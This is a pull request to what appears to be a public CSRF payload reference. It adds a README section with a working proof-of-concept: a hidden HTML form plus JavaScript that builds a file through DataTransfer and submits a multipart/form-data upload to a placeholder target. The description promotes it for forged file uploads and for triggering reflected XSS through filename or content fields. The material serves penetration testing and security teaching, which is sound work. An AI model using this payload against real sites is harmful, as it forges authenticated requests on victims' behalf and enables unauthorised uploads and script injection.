### PR TITLE
Add multipart/form-data CSRF technique

### DIFF
--- a/CSRF Injection/README.md
+++ b/CSRF Injection/README.md
@@ -11,6 +11,7 @@
     * [HTML GET - No User Interaction)](#html-get---no-user-interaction)
     * [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction)
     * [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction)
+    * [HTML POST - multipart/form-data with file upload - Requiring User Interaction](#html-post---multipartform-data-with-file-upload---requiring-user-interaction)
     * [JSON GET - Simple Request](#json-get---simple-request)
     * [JSON POST - Simple Request](#json-post---simple-request)
     * [JSON POST - Complex Request](#json-post---complex-request)
@@ -65,6 +66,27 @@ When you are logged in to a certain site, you typically have a session. The iden
 <script>
  document.getElementById("autosubmit").submit();
 </script>
+```
+
+### HTML POST - multipart/form-data with file upload - Requiring User Interaction
+
+```html
+<script>
+function launch(){
+    const dT = new DataTransfer();
+    const file = new File( [ "CSRF-filecontent" ], "CSRF-filename" );
+    dT.items.add( file );
+    document.xss[0].files = dT.files;
+
+    document.xss.submit()
+}
+</script>
+
+<form style="display: none" name="xss" method="post" action="<target>" enctype="multipart/form-data">
+<input id="file" type="file" name="file"/>
+<input type="submit" name="" value="" size="0" />
+</form>
+<button value="button" onclick="launch()">Submit Request</button>
 ```
 
 


### PR DESCRIPTION
This pull adds a technique for sending multipart/form-data requests with upload files in CSRF / reflected XSS attacks. Useful for CSRF file upload or for popping reflected XSS in filename/filecontent parameters